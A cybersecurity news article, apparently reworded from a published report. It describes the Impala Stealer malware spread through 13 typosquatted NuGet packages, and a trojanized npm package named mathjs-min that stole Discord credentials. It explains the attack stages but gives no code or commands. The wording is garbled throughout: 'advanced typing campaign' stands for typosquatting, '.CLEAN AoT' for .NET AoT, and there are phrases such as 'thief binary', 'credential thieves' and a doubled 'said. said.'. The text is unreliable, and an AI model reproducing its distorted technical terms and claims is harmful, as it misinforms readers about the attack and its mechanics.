Cryptocurrency Stealing Malware Distributed via 13 NuGet Packages

April 11, 2023Ravie LakshmananSoftware / Cryptocurrency Security

Cybersecurity researchers have detailed the inner workings of cryptocurrency-stealing malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.

The advanced typing campaign, spotted by JFrog late last month, masquerades as a legitimate package for executing PowerShell code designed to fetch advanced binaries from hard-coded servers.

That two level attack culminating in the deployment of a .NET-based persistent backdoor, called the Impala Stealer, which was able to gain unauthorized access to users’ cryptocurrency accounts.

“The payload uses a very rare obfuscation technique, called ‘.NET AoT compilation’, which is far more stealthy than using an ‘off the shelf’ obfuscator while still making binaries difficult to reverse engineer,” JFrog told The Hacker News in a statement.

.CLEAN AoT compilation is optimization technique which allows apps to be precompiled to native code. Native AOT apps also have a faster startup time and smaller memory footprint, and can run on machines without the .NET runtime installed.

The second stage payload comes with an automatic update mechanism that allows it to fetch new versions of executables from remote locations. It further achieves persistence by injecting JavaScript code into the Discord application or Microsoft Visual Studio Code, thus enabling the launch of the thief binary.

The binary then proceeds to search for installations of the Exodus Wallet desktop application and inject JavaScript code into various HTML files to harvest and extract sensitive data to hard-coded Discord webhooks.

The JavaScript snippet, for its part, was taken from the online paste website from where it has been removed. That said, it is suspected that the code may have been used to steal user credentials and access other interesting information.

“Bad actors use typosquatting techniques to deploy custom malicious payloads (…) that target the Exodus crypto wallet and leak victims’ credentials to cryptocurrency exchanges, using code injection,” said Shachar Menashe, senior director at JFrog Security Research. .

“Our investigation proves that no open source software repository can be truly trusted, so security measures must be taken at every step of the software development lifecycle to ensure the software supply chain remains secure.”

The findings came when Phylum discovered a malicious npm package called mathjs-min that was uploaded to the repository on March 26, 2023, and was found to harbor credential thieves that retrieved Discord passwords from official apps as well as web browsers such as Google Chrome, Brave, and Opera.

“This package is actually a modified version of the widely used Javascript math library, and was injected with malicious code after being forked,” the software supply chain security company said. said. “A modified version was then published to NPM with the intention of providing it as a mini version of the original math library.”